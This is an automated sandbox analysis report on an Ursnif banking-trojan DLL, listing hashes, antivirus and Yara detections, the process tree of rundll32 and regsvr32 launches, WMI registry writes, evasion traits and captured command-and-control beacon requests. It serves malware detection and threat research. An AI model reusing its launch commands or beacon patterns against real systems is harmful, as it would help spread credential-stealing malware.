Windows Analysis Report MGrYFpGLQ7.dll

Overview

General Information

Sample Name: MGrYFpGLQ7.dll
Analysis ID: 481120
MD5: 8c7b2ff105963718fa3c26989e206041
SHA1: 831ece0ae6b5e2f373f75352e582abd61b5dd0d7
SHA256: 90d8648b2aac0c837286a4c042f02064cfbb12f45b3dc6b00b2beccc7fc35422

Detection

Ursnif
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Found stalling execution ending in API Sleep call
Writes or reads registry keys via WMI
Writes registry values via WMI
Machine Learning detection for sample
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2880 cmdline: loaddll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3428 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5040 cmdline: rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3556 cmdline: regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 4728 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6320 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6424 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 7140 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17438 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6396 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83004 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17452 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5704 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83036 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17470 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2624 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Bighearted MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5352 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Soaking MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6276 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Turnipy MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6536 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Watertight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6708 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Dithery MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7000 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anhimae MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1496 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anostraca MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2964 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1068 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anaerobian MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6372 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Sparsile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5908 cmdline: rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: MGrYFpGLQ7.dll, Avira: detected
Multi AV Scanner detection for submitted file
Source: MGrYFpGLQ7.dll, Virustotal: Detection: 82%
Source: MGrYFpGLQ7.dll, Metadefender: Detection: 59%
Source: MGrYFpGLQ7.dll, ReversingLabs: Detection: 88%
Machine Learning detection for sample
Source: MGrYFpGLQ7.dll, Joe Sandbox ML: detected
Source: 3.2.rundll32.exe.510000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.regsvr32.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.5f0000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: MGrYFpGLQ7.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown, HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00C732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_040832BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_047B32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_04BF32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 12_2_04C032BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 16_2_043532BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 18_2_067732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 21_2_04FD32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49859 -> 13.225.29.132:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49859 -> 13.225.29.132:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49863 -> 13.225.29.132:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49907 -> 13.225.29.132:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49907 -> 13.225.29.132:80
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown, Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown, DNS traffic detected: queries for: www.msn.com
Source: global traffic, HTTP traffic detected:
    GET /cookieconsentpub/v1/geo/location HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: geolocation.onetrust.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1
    Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: s.yimg.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Source: unknown, HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.5:49819 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
            Source: Yara matchFile source: 0000001E.00000003.370755681.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370579660.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366907200.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391783104.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391671709.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366961006.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366875687.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391794887.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370911517.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391596036.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370793730.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367026517.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: MGrYFpGLQ7.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\System32\loaddll32.exe, Section loaded: lpk.dll
            Source: C:\Windows\System32\loaddll32.exe, Section loaded: msafd.dll
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
